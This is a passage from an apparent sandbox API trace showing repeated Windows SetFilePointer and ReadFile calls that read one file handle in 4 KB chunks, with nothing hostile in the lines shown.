lpOverlapped=0x0) returned 1 [0081.181] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x9d000 [0081.181] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.181] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x9e000 [0081.182] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.182] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x9f000 [0081.182] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.182] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xa0000 [0081.182] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.184] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xa1000 [0081.184] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.184] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xa2000 [0081.184] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.185] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xa3000 [0081.185] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.185] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xa4000 [0081.185] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.186] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xa5000 [0081.186] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.186] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xa6000 [0081.186] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.186] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xa7000 [0081.187] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.187] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xa8000 [0081.187] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.188] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xa9000 [0081.188] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.189] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xaa000 [0081.189] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.189] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xab000 [0081.189] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.190] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xac000 [0081.190] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.190] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xad000 [0081.190] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.190] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xae000 [0081.191] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.191] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xaf000 [0081.191] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.192] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xb0000 [0081.192] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.192] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xb1000 [0081.192] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.193] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xb2000 [0081.193] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.193] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xb3000 [0081.193] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.194] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xb4000 [0081.194] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.195] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xb5000 [0081.195] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.195] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xb6000 [0081.195] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.196] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xb7000 [0081.196] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.197] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xb8000 [0081.197] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.197] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xb9000 [0081.197] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.198] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xba000 [0081.198] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.198] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xbb000 [0081.198] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.199] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xbc000 [0081.199] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.199] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xbd000 [0081.199] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.200] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xbe000 [0081.200] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.200] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xbf000 [0081.200] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.201] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xc0000 [0081.201] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.203] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xc1000 [0081.203] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.203] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xc2000 [0081.204] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.204] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xc3000 [0081.204] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.204] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xc4000 [0081.204] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.205] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xc5000 [0081.205] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.205] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xc6000 [0081.205] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.206] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xc7000 [0081.206] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.206] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xc8000 [0081.206] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.206] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xc9000 [0081.207] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.208] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xca000 [0081.208] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.208] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xcb000 [0081.208] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.209] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xcc000 [0081.209] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.209] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xcd000 [0081.209] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.210] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xce000 [0081.210] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.210] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xcf000 [0081.210] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.211] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xd0000 [0081.211] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.211] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xd1000 [0081.211] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.212] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xd2000 [0081.212] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.213] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xd3000 [0081.213] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.213] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: 